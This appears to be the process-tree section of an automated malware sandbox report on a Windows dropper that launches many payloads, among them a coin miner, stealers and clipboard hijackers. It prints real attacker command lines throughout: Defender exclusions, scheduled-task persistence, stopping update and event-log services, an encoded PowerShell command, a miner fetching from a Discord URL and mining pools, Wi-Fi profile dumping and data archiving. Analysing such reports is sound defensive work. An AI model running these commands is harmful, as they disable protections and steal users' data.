        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        6⤵
        
        PID:2636
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5392
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:6072
      - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        6⤵
        
        PID:6424
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5632
      - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        6⤵
        
        PID:1416
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6324
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:5440
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 600
        5⤵
        Program crash
        
        PID:2688
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 912
      4⤵
      Program crash
      PID:5064
- - C:\Users\Admin\AppData\Local\Temp\Files\SvCpJuhbT.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\SvCpJuhbT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Windows\SysWOW64\notepad.exe
      "C:\Windows\SysWOW64\notepad.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2252
    - - C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
        5⤵
        
        PID:1100
- - C:\Users\Admin\AppData\Local\Temp\Files\crazyCore.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\crazyCore.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3460
- - C:\Users\Admin\AppData\Local\Temp\Files\new.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\new.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1444
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:1488
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 1316
        5⤵
        Program crash
        
        PID:756
- - C:\Users\Admin\AppData\Local\Temp\Files\Build.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Build.exe"
    3⤵
    - Executes dropped EXE
    PID:3744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAeQB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAbAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAZQB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AZQB4ACMAPgA="
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1364
  - - C:\Users\Admin\AppData\Roaming\Miner.exe
      "C:\Users\Admin\AppData\Roaming\Miner.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      PID:4904
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2368
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:2232
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2392
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:4200
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:3448
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:2268
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:6068
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5188
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "RYVSUJUA"
        5⤵
        Launches sc.exe
        
        PID:1304
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4652
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "RYVSUJUA" binpath= "C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:6992
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:7876
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "RYVSUJUA"
        5⤵
        Launches sc.exe
        
        PID:4620
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Miner.exe"
        5⤵
        
        PID:756
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:8252
  - - C:\Users\Admin\AppData\Local\Temp\Stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\Stealer.exe"
      4⤵
      Executes dropped EXE
      PID:4292
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 2196
        5⤵
        Program crash
        
        PID:2572
- - C:\Users\Admin\AppData\Local\Temp\Files\net.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
  - - C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
      "C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4600
    - - C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
        5⤵
        
        PID:2856
  - - C:\Users\Admin\AppData\Local\Temp\Files\net.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      PID:2520
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 504
        5⤵
        Program crash
        
        PID:756
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 528
        5⤵
        Program crash
        
        PID:1212
- - C:\Users\Admin\AppData\Local\Temp\Files\ProjectE_5.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ProjectE_5.exe"
    3⤵
    - Executes dropped EXE
    PID:3408
- - C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:200
  - - C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
      4⤵
      PID:3244
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 480
        5⤵
        Program crash
        
        PID:8204
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 448
        5⤵
        Program crash
        
        PID:6336
- - C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
    3⤵
    - Executes dropped EXE
    PID:452
- - C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe"
    3⤵
    - Executes dropped EXE
    PID:456
- - C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
    3⤵
    - Executes dropped EXE
    PID:2968
- - C:\Users\Admin\AppData\Local\Temp\Files\EPQ.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\EPQ.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    PID:2904
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\EPQ.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5828
- - C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
    3⤵
    - Executes dropped EXE
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\696517839.exe
      C:\Users\Admin\AppData\Local\Temp\696517839.exe
      4⤵
      Executes dropped EXE
      PID:7028
    - - C:\Windows\sysbrapsvc.exe
        
        C:\Windows\sysbrapsvc.exe
        5⤵
        
        PID:6280
      - C:\Users\Admin\AppData\Local\Temp\222493152.exe
        
        C:\Users\Admin\AppData\Local\Temp\222493152.exe
        6⤵
        
        PID:1372
      - C:\Users\Admin\AppData\Local\Temp\1528929483.exe
        
        C:\Users\Admin\AppData\Local\Temp\1528929483.exe
        6⤵
        
        PID:8412
        
        C:\Users\Admin\AppData\Local\Temp\1085711838.exe
        
        C:\Users\Admin\AppData\Local\Temp\1085711838.exe
        7⤵
        
        PID:5924
        
        C:\Users\Admin\AppData\Local\Temp\1196935045.exe
        
        C:\Users\Admin\AppData\Local\Temp\1196935045.exe
        7⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\3252229473.exe
        
        C:\Users\Admin\AppData\Local\Temp\3252229473.exe
        7⤵
        
        PID:8464
      - C:\Users\Admin\AppData\Local\Temp\3197913583.exe
        
        C:\Users\Admin\AppData\Local\Temp\3197913583.exe
        6⤵
        
        PID:5148
      - C:\Users\Admin\AppData\Local\Temp\1192910666.exe
        
        C:\Users\Admin\AppData\Local\Temp\1192910666.exe
        6⤵
        
        PID:7116
- - C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe"
    3⤵
    PID:8140
  - - C:\Users\Admin\AppData\Local\Temp\u6a4.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u6a4.0.exe"
      4⤵
      PID:6080
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6080 -s 1432
        5⤵
        Program crash
        
        PID:7952
  - - C:\Users\Admin\AppData\Local\Temp\u6a4.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u6a4.1.exe"
      4⤵
      PID:3032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8140 -s 1172
      4⤵
      Program crash
      PID:5968
- - C:\Users\Admin\AppData\Local\Temp\Files\task.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\task.exe"
    3⤵
    PID:6768
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 780
      4⤵
      Program crash
      PID:8916
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 844
      4⤵
      Program crash
      PID:200
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 896
      4⤵
      Program crash
      PID:4076
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 904
      4⤵
      Program crash
      PID:8892
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 944
      4⤵
      Program crash
      PID:5992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 984
      4⤵
      Program crash
      PID:6700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1112
      4⤵
      Program crash
      PID:2736
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1120
      4⤵
      Program crash
      PID:3512
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1212
      4⤵
      Program crash
      PID:7004
  - - C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
      "C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
      4⤵
      PID:1204
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 588
        5⤵
        Program crash
        
        PID:3192
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 596
        5⤵
        Program crash
        
        PID:8516
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 624
        5⤵
        Program crash
        
        PID:1028
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 892
        5⤵
        Program crash
        
        PID:6804
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 924
        5⤵
        Program crash
        
        PID:7968
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 908
        5⤵
        Program crash
        
        PID:4600
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 956
        5⤵
        Program crash
        
        PID:5244
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 964
        5⤵
        Program crash
        
        PID:1740
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1020
        5⤵
        Program crash
        
        PID:8924
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1148
        5⤵
        Program crash
        
        PID:6152
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1164
        5⤵
        Program crash
        
        PID:8088
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1260
        5⤵
        Program crash
        
        PID:6172
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1460
        5⤵
        Program crash
        
        PID:6800
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1548
        5⤵
        Program crash
        
        PID:7088
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
        5⤵
        
        PID:5460
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
        6⤵
        
        PID:4076
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:6524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\230210488309_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6412
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
        5⤵
        
        PID:6292
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1116
        5⤵
        Program crash
        
        PID:7696
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1548
        5⤵
        Program crash
        
        PID:1832
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1172
        5⤵
        Program crash
        
        PID:6136
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1184
        5⤵
        Program crash
        
        PID:5308
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1396
        5⤵
        Program crash
        
        PID:4896
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1772
        5⤵
        Program crash
        
        PID:5484
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1524
        5⤵
        Program crash
        
        PID:912
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1804
        5⤵
        Program crash
        
        PID:2924
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1752
        5⤵
        Program crash
        
        PID:6856
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1160
        5⤵
        Program crash
        
        PID:6568
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 852
      4⤵
      Program crash
      PID:6728
- - C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe"
    3⤵
    PID:1884
  - - C:\Windows\SysWOW64\clip.exe
      "C:\Windows\SysWOW64\clip.exe"
      4⤵
      PID:8768
- - C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"
    3⤵
    PID:5216
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 2404
      4⤵
      Program crash
      PID:6896
- - C:\Users\Admin\AppData\Local\Temp\Files\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\AppData\Local\Temp\Files\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:1968
- - C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe"
    3⤵
    PID:5704
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:9160
  - - C:\Users\Admin\AppData\Local\Temp\1000247001\ISetup8.exe
      "C:\Users\Admin\AppData\Local\Temp\1000247001\ISetup8.exe"
      4⤵
      PID:8004
    - - C:\Users\Admin\AppData\Local\Temp\u66c.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u66c.0.exe"
        5⤵
        
        PID:6248
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 1272
        6⤵
        Program crash
        
        PID:7996
    - - C:\Users\Admin\AppData\Local\Temp\u66c.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u66c.1.exe"
        5⤵
        
        PID:3384
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 1156
        5⤵
        Program crash
        
        PID:7004
  - - C:\Users\Admin\AppData\Local\Temp\1000249001\toolspub1.exe
      "C:\Users\Admin\AppData\Local\Temp\1000249001\toolspub1.exe"
      4⤵
      PID:5864
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5864 -s 384
        5⤵
        Program crash
        
        PID:6880
  - - C:\Users\Admin\AppData\Local\Temp\1000250001\4767d2e713f2021e8fe856e3ea638b58.exe
      "C:\Users\Admin\AppData\Local\Temp\1000250001\4767d2e713f2021e8fe856e3ea638b58.exe"
      4⤵
      PID:7832
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8576
    - - C:\Users\Admin\AppData\Local\Temp\1000250001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000250001\4767d2e713f2021e8fe856e3ea638b58.exe"
        5⤵
        
        PID:6004
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2520
- - C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"
    3⤵
    PID:8236
- - C:\Users\Admin\AppData\Local\Temp\Files\first.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\first.exe"
    3⤵
    PID:824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\first.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4676
- - C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"
    3⤵
    PID:6928
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1560
- - C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"
    3⤵
    PID:7648
- - C:\Users\Admin\AppData\Local\Temp\Files\fud_new.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\fud_new.exe"
    3⤵
    PID:8312
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8312 -s 508
      4⤵
      Program crash
      PID:5816
- - C:\Users\Admin\AppData\Local\Temp\Files\73.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\73.exe"
    3⤵
    PID:8348
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1696
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:5800
- - C:\Users\Admin\AppData\Local\Temp\Files\eee01.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\eee01.exe"
    3⤵
    PID:8220
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8220 -s 712
      4⤵
      Program crash
      PID:3128
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8220 -s 720
      4⤵
      Program crash
      PID:4804
- - C:\Users\Admin\AppData\Local\Temp\Files\update.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
    3⤵
    PID:828
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 408
      4⤵
      Program crash
      PID:4360
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 444
      4⤵
      Program crash
      PID:3696
- - C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe"
    3⤵
    PID:6544
  - - C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\cryptography_module_windows.exe"
      4⤵
      PID:5816
- - C:\Users\Admin\AppData\Local\Temp\Files\hjv.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\hjv.exe"
    3⤵
    PID:4944
  - - C:\Users\Admin\AppData\Local\Temp\Files\hjv.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\hjv.exe"
      4⤵
      PID:2464
- - C:\Users\Admin\AppData\Local\Temp\Files\amadey.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\amadey.exe"
    3⤵
    PID:8796
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8796 -s 512
      4⤵
      Program crash
      PID:7628
- - C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
    3⤵
    PID:484
  - - C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
      4⤵
      PID:7364
- - C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"
    3⤵
    PID:2220
- - C:\Users\Admin\AppData\Local\Temp\Files\VmManagedSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\VmManagedSetup.exe"
    3⤵
    PID:7868
- - C:\Users\Admin\AppData\Local\Temp\Files\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]
    "C:\Users\Admin\AppData\Local\Temp\Files\%E5%85%81%E8%AE%B8%E6%B3%A8%E9%94%[email protected]"
    3⤵
    PID:7788
- - C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
    3⤵
    PID:1316
